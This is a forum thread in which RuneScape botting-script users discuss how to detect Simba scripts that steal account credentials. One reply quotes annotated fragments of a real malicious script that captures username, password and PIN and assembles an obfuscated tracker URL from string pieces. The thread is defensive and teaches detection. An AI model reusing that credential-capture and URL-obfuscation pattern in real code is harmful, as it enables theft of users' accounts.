Results 1 to 13 of 13

Thread: How to check for malicious scripts

  1. #1
    Join Date
    Jan 2012
    Posts
    26
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Smile How to check for malicious scripts

    Hello!

    I am curious about how we can check for scripts which will steal data and sends it back to the creator.

    Can anyone advise please?

    Thanks

  2. #2
    Join Date
    Jan 2012
    Posts
    273
    Mentioned
    7 Post(s)
    Quoted
    6 Post(s)

    Default

    Quote Originally Posted by ninoqino View Post
    Hello!

    I am curious about how we can check for scripts which will steal data and sends it back to the creator.

    Can anyone advise please?

    Thanks
    it isn't a straightforward thing to answer. i looked into one of the scripts that used to be here and got removed and poster banned - someone asked about it earlier and this is what i saw:


    first of all any time you have any kind of operation within the script that has username or password or pin on the RIGHT HAND of the assignment, that's not good

    an example from actual code that i looked at (also note statements that clearly are for lack of a better term - utterly stupid nonsense - such as testing if 1+3 is larger than 0... that's just wrong, or assigning variable its own value)


    Simba Code:
    Function LV:Boolean;
    begin
    If(1+3>0)then <<< WHAT????
      begin
        C:=C; <<< WHAT????
        I:=I; <<< WHAT????
        Z:=Z; <<< WHAT????
        I:=Players[CurrentPlayer].Name; <<< AHA! that is where my login goes
        G:= Players[CurrentPlayer].Pin;
        Z:=Players[CurrentPlayer].Pass;
        Result:=True;
      end;
    end;

    also look for cryptic stuff that does not need to be cryptic (i.e. why spend so much time writing so many short string variables to make one url? because you are throwing in my username and password and pin, duh!):

    Simba Code:
    Function K:Boolean;
    Var
      PZ,AZ,AX,TY,LM,BS,RJ,RF,DB,AJ,RN,TP,GY,PS,LJ,LD,DF,DT,YT,DS,DV,MM,BP,NP,FP,SW,QA,SX,RA,US,OZ,OP,LB:String;
      begin
        PZ:= I; <<<<< HEY is this my player username??????
        LM:= Z; <<<< HEY this looks an awfully much like the variable with my password
        FFS:='Au'; FPS:='th'; LLM:='en'; RBJ:='ti';RJK:='ca';KKK:='ted.';      //Authenticated..
     
                  //Decoder characters..
        LD:='fx';BS:= 'tu';RF:='re'; DB:='cr';OP:='i';OZ:='I';RN:= 'te';TP:= 'r.';
        GY:= 'zx';AZ:= ':/';PS:= 'q';DF:='e';US:='s'; TY:= 'ht'; DV:='da';DT:='t';YT:='/';
        DS:='up';LJ:='.n'; AJ:= 'af';MM:='te';BP:='r.';RJ:= 'na'SW:='ph';AX:= 'tp';QA:='?v';
        SX:='er'; RA:='p';NP:='&';FP:='q=';
     
        Q:=NP;                                    //&
        L:=FP;                                    //q=
        TR:=TY+AX+AZ+YT+RJ+BS+RF+DB+AJ+RN+TP+GY+PS+LJ+DF+DT+'/tracker.'+SW+RA;  //TR:= [url]HTTP://naturecrafter.zxq.net/tracker.php[/url]

    so my suggestions are:

    • if the script is hard to read - run away from it
    • always have simba firewall on and do not just accept exception without making sure that it uses website that you trust
    • check the code for anything anomalous or nonsensical*
    • search for the pin and password and username variables and make sure they are not assigned to something else
    • if the script uses ini file to store values, make sure that the values it reads are not similarly misused


    * loops like "while true do mainloop;" are however valid, they just say "keep looping until forever".
    Perfect script? There is no such thing as "perfect", only "better than you expect".

  3. #3
    Join Date
    Oct 2008
    Location
    C:\Simba\Includes\
    Posts
    7,566
    Mentioned
    19 Post(s)
    Quoted
    180 Post(s)

    Default

    zmon basically hit the nail on the head. A quick way to check is to find where "Username", "Password", and "Pin" show up. If they appear anywhere out of the DeclarePlayers, InPin, or any other pre built method from the SRL include, I would investigate it to see what it's doing.

    However, there's ~1% you'll download a malicious script from here. We keep on top of that pretty well. Also, enable security.sex, it will show you all connections being made from a script.
    Away for awhile, life is keeping me busy. | Want to get my attention in a thread? @Kyle Undefined; me.
    { MSI Phoenix || SRL Stats Sigs || Paste || Scripts || Quotes || Graphics }

    When posting a bug, please post debug! Help us, help you!

    I would love to change the world, but they won't give me the source code. || To be the best, you've got to beat the rest. || Logic never changes, just the syntax.
    If you PM me with a stupid question or one listed in FAQ, or about a script that is not mine, I will NOT respond.


    SRL is a Library of routines made by the SRL community written for the Program Simba. We produce Scripts for the game Runescape.


  4. #4
    Join Date
    Feb 2006
    Location
    Tracy/Davis, California
    Posts
    12,631
    Mentioned
    135 Post(s)
    Quoted
    418 Post(s)

    Default

    Normally you can ctrl f for .name and if it's anywhere in the script besides the top/progress report then it might be risky.

    You cab enable the security.sex extension and it will tell you every time the script tries to acess the Internet. If it's trying to talk to anything besides SRL stats (and MAYBE the scripts auto update page IF it had one(not many do)) then be worried.


    Honestly in all of SRl/SCARs history there have been very few malicious scripts, not much to worry about!

  5. #5
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)

    Default

    You have to have some knowledge in order to find certain lines of code which may send your username and password somewhere.

    The easiest way I can think of to prevent this is to do the following

    1. Open Simba
    2. Click "view" and then click "extentions"
    3. Enable security.sex

    Whenever Simba tries to make a connection somewhere it will prompt you and ask you if you would like to allow the connection. If you see an unusual connection to some random website decline it.

    Quote Originally Posted by YoHoJo View Post
    Honestly in all of SRl/SCARs history there have been very few malicious scripts, not much to worry about!
    This is very true. I have been here since 2008 and I have only ever seen one or two instances of someone creating a script to steal usernames and passwords.
    Last edited by cycrosism; 05-26-2012 at 07:51 AM.
    Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |

  6. #6
    Join Date
    Jan 2012
    Posts
    26
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Thanks so much for the clarification guys!

  7. #7
    Join Date
    Jul 2011
    Location
    /home/litoris
    Posts
    2,226
    Mentioned
    0 Post(s)
    Quoted
    159 Post(s)

    Default

    Generally, if the script communicates with a webpage its malicious. I never get scripts off site, but when checking some I found around, I deleted all the links in the script.
    Miner & Urn Crafter & 07 Chicken Killer
    SPS BlindWalk Tutorial

    Working on: Nothing

    teacher in every art, brought the fire that hath proved to mortals a means to mighty ends

  8. #8
    Join Date
    Feb 2012
    Location
    Denver, CO
    Posts
    863
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Default

    Wow, I didn't realize how well URLs could be disguised.

    Thanks for the info, guys!

  9. #9
    Join Date
    Feb 2011
    Location
    The Future.
    Posts
    5,600
    Mentioned
    396 Post(s)
    Quoted
    1598 Post(s)

    Default

    There's also another way that's a bit harder to recognize..

    [Content removed]

    This kind of malicious script is actually pretty well hidden and a simple control F does nothing.

    EDITED: Post was too detailed.. Like Yohojo said below.. the ideas mentioned are too dangerous..
    Last edited by Brandon; 05-27-2012 at 07:31 AM.
    I am Ggzz..
    Hackintosher

  10. #10
    Join Date
    Feb 2006
    Location
    Tracy/Davis, California
    Posts
    12,631
    Mentioned
    135 Post(s)
    Quoted
    418 Post(s)

    Default

    InB4 h3x0rs use this thread to make one D:

  11. #11
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)

    Default

    Quote Originally Posted by litoris View Post
    Generally, if the script communicates with a webpage its malicious.
    This is false.
    Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |

  12. #12
    Join Date
    Nov 2007
    Location
    Nowhereville
    Posts
    1,155
    Mentioned
    0 Post(s)
    Quoted
    3 Post(s)

    Default

    Quote Originally Posted by cycrosism View Post
    This is false.
    I'll concur. Lots of scripts that connect to webpages create accounts, check the itemdb, check for updates, and do lots of other things.
    Formerly known as Cut em2 it

  13. #13
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)

    Default

    Quote Originally Posted by Cut em2 it View Post
    I'll concur. Lots of scripts that connect to webpages create accounts, check the itemdb, check for updates, and do lots of other things.
    I made a script that when it was run (Before it opened SMART and all of that), would connect to my website and grab the latest "news" that I had put up and would also check to make sure the script was up to date.

    It never sent any data to my website. Only read data using the GetPage function.

    It would grab this link here

    http://cycrosism.webs.com/news.txt

    Then it would read all of the data from it and print it out in the debug box. That was all it did. I also made a version checker but I cannot seem to find it anywhere.

    Here is a sample of how I did this.

    Simba Code:
    program new;
    begin
      Cleardebug;
      Writeln(Getpage('http://cycrosism.webs.com/news.txt'));
    end.
    Last edited by cycrosism; 05-27-2012 at 09:12 AM.
    Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •